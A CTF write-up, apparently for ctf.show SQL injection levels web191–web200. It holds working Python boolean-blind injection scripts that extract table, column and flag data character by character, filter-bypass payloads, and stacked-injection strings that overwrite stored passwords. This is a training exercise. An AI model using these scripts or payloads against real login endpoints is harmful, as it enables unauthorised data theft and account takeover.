web191
多了一个正则绕过
上脚本布尔盲注
用ord
#author:yu22x
import requests
import string
# Boolean-based blind extraction script (ctf.show web191), one character per
# HTTP request. The oracle is the response body: the `if` below looks for the
# JSON-escaped text "\u5bc6\u7801\u9519\u8bef" (密码错误, "wrong password") and
# treats its presence as the "condition true" branch. From a defender's view the
# distinguishable error text is exactly what turns the login endpoint into an
# oracle; a uniform failure response would remove that signal.
url="http://70adf0cb-2208-4974-b064-50a4f4103541.challenge.ctf.show/api/index.php"
# Character set; not referenced anywhere in the visible script (the inner loop
# iterates over ASCII codes 32..127 instead).
s=string.ascii_letters+string.digits
# Accumulates the recovered characters, one per matched position.
flag=''
# Positions 1..44 of the target value. There is no early stop, so the run always
# scans all 44 positions even after the value is exhausted.
for i in range(1,45):
    # Progress marker: the position currently being probed.
    print(i)
    # Candidate ASCII codes for the printable range 32..127. If no code matches,
    # the position is skipped without any output (no `else` branch).
    for j in range(32,128):
        # enumerate database name (kept by the author, disabled)
        # data={
        # 'username':f"'||if(ascii(substr(database(),{i},1))={j},1,0)#",
        # 'password':'1'
        # }
        # enumerate table names (disabled)
        # data={
        # 'username':f"'||if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),{i},1))={j},1,0)#",
        # 'password':'1'
        # }
        # enumerate column names (disabled)
        # data={
        # 'username':f"'||if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='ctfshow_fl0g'),{i},1))={j},1,0)#",
        # 'password':'1'
        # }
        # enumerate data — the active payload. `ord` is used instead of `ascii`
        # because, per the write-up text above, `ascii` is caught by a regex filter
        # in this level.
        data={
            'username':f"'||if(ord(substr((select f1ag from ctfshow_fl0g),{i},1))={j},1,0)#",
            'password':'1'
        }
        r=requests.post(url,data=data)
        # The Python literal "\\u5bc6..." is a backslash followed by "u5bc6", i.e. it
        # matches the raw, still-escaped JSON text rather than the decoded string.
        if("\\u5bc6\\u7801\\u9519\\u8bef" in r.text):
            flag+=chr(j)
            # Prints the partial result after every matched character.
            print(flag)
            break
web192
直接不用ord了,改成跑字符。
#author:yu22x
import requests
import string
# Boolean-based blind extraction script (ctf.show web192). Same structure as the
# web191 script, but the injected condition compares the substring against the
# candidate character itself rather than its ASCII/ord value (the write-up text
# above says the numeric functions are no longer usable here). The oracle is
# again the JSON-escaped "\u5bc6\u7801\u9519\u8bef" (密码错误, "wrong password")
# text in the response body, whose presence is treated as "condition true".
url="http://960c0983-53e2-470d-8482-88d1edee6500.challenge.ctf.show/api/index.php"
# Character set; not referenced anywhere in the visible script.
s=string.ascii_letters+string.digits
# Accumulates the recovered characters, one per matched position.
flag=''
# Positions 1..44; no early stop once the value is exhausted.
for i in range(1,45):
    # Progress marker: the position currently being probed.
    print(i)
    # Candidate ASCII codes 32..127, converted with chr(j) inside the payload.
    # If no candidate matches, the position is skipped silently.
    for j in range(32,128):
        # enumerate table names (kept by the author, disabled)
        # data={
        # 'username':f"'||if((substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),{i},1))='{chr(j)}',1,0)#",
        # 'password':'1'
        # }
        # enumerate column names (disabled)
        # data={
        # 'username':f"'||if((substr((select group_concat(column_name)from information_schema.columns where table_name='ctfshow_fl0g'),{i},1))='{chr(j)}',1,0)#",
        # 'password':'1'
        # }
        # enumerate data — the active payload.
        data={
            'username':f"'||if((substr((select f1ag from ctfshow_fl0g),{i},1))='{chr(j)}',1,0)#",
            'password':'1'
        }
        r=requests.post(url,data=data)
        # Matches the raw, still-escaped JSON text (backslash + "u5bc6" ...), not
        # the decoded Chinese string.
        if("\\u5bc6\\u7801\\u9519\\u8bef" in r.text):
            flag+=chr(j)
            print(flag)
            break
但是这个东西太慢了，找了一个稍微快一点的。
#@Auth:Sentiment
import requests
# Faster variant of the web192 script: instead of trying every character, each
# position is resolved by a binary search over ASCII codes 32..127 using a `<`
# comparison in the injected condition, so roughly log2(95) requests per
# position instead of up to 95. The oracle is unchanged — the JSON-escaped
# "\u5bc6\u7801\u9519\u8bef" (密码错误, "wrong password") text in the body.
url='http://960c0983-53e2-470d-8482-88d1edee6500.challenge.ctf.show/api/index.php'
# Accumulates the recovered characters.
flag=''
# Positions 1..99. There is no stop condition once the value is exhausted; the
# outer loop always runs all 99 positions.
for i in range(1,100):
    # Search bounds (inclusive lower, exclusive upper) over the ASCII range.
    m=32
    n=127
    while 1:
        mid=(m+n)//2
        data={
            # enumerate table names (kept by the author, disabled)
            #'username':"admin' and (substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<'{}'#".format(i,chr(mid)),#ctfshow_fl0g,ctfshow_user
            # enumerate column names (disabled)
            #'username':"admin' and (substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{},1))<'{}'#".format(i, chr(mid)), # id,f1ag
            # enumerate data — the active payload; the author's recovered value is
            # recorded in the trailing comment.
            'username':"admin' and (substr((select f1ag from ctfshow_fl0g),{},1))<'{}'#".format(i, chr(mid)), # ctfshow{7b03d3e9-190a-43f2-9b13-008c7d2ce6f7}
            'password':0
        }
        #print(data)
        r=requests.post(url=url,data=data)
        # "wrong password" present => the author treats the condition
        # (char < chr(mid)) as true and moves the upper bound down; otherwise the
        # lower bound moves up.
        if "\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
            n=mid
        else:
            m=mid
        # Bounds have converged: the character at this position is chr(m).
        if (m + 1 == n):
            flag += chr(m)
            # Only the printed copy is lower-cased; `flag` itself keeps the
            # recovered case. NOTE(review): presumably done because the `<`
            # comparison in the oracle is case-insensitive under the default
            # collation — confirm against the target's collation.
            print(flag.lower())
            break
web193
#@Auth:Sentiment
import requests
# Blind extraction script for ctf.show web193, prefix-based: each request tests
# whether the target value starts with `flag + j` by injecting a LIKE pattern of
# the form "<known prefix><candidate>%". The oracle is again the JSON-escaped
# "\u5bc6\u7801\u9519\u8bef" (密码错误, "wrong password") text in the response
# body, whose presence is treated as "pattern matched".
url='http://617039c3-6190-4487-ab63-7d139273ad98.challenge.ctf.show/api/index.php'
# Accumulates the recovered prefix; it is fed back into every subsequent pattern.
flag=''
# Up to 100 characters. There is no stop condition once the value is exhausted,
# so the outer loop always runs 100 times.
for i in range(100):
    # Fixed candidate alphabet (lowercase letters, digits, and a few punctuation
    # characters). A position whose character is outside this alphabet is never
    # matched, and the script then simply moves on to the next position with the
    # prefix unchanged (no `else` branch).
    for j in 'abcdefghijklmnopqrstuvwxyz0123456789-_,{}':
        data={
            # enumerate table names (kept by the author, disabled)
            #'username':"admin' and (select group_concat(table_name) from information_schema.tables where table_schema=database())like'{}'#".format(flag+j+'%'),#ctfshow_flxg
            # enumerate column names (disabled)
            #'username':"admin' and (select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg')like'{}'#".format(flag+j+'%'), # id,f1ag
            # enumerate data — the active payload; the author's recovered value is
            # recorded in the trailing comment.
            'username':"admin' and (select f1ag from ctfshow_flxg)like'{}'#".format(flag+j+'%'), # ctfshow{7b03d3e9-190a-43f2-9b13-008c7d2ce6f7}
            'password':0
        }
        r=requests.post(url=url,data=data)
        # Matches the raw, still-escaped JSON text (backslash + "u5bc6" ...).
        if "\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
            flag+=j
            # Prints the partial result after every accepted character.
            print(flag)
            break
web194
上一个脚本继续用
web195
堆叠注入
目标存在 SQL 注入漏洞；目标未对 ";" 号进行过滤；目标中间层查询数据库信息时可同时执行多条 SQL 语句。
username 填写 0 时显示“密码错误”，就说明可以在这里进行堆叠，用命令把密码设置一下：
0;update`ctfshow_user`set`pass`=1
1
或者
下面这两句话都是在username进行的,密码随便填写
0;update(ctfshow_user)set`username`=1;(必须是0,不然的话没有回显显示用户名错误)
1;update(ctfshow_user)set`pass`=1;
然后username=1&password=1登录就行
web196
过滤了select但是联合注入是可以绕过的
成功的原因就是进行注入的时候 0 返回 null，然后 select(常数) 就会把常数放在 row 里面。
username=0;select(1);
password=1
web197
$sql = "select pass from ctfshow_user where username = {$username};";
已知这个表叫做ctfshow_user
username=0;show tables;
password=ctfshow_user
web 198–web200
与上题同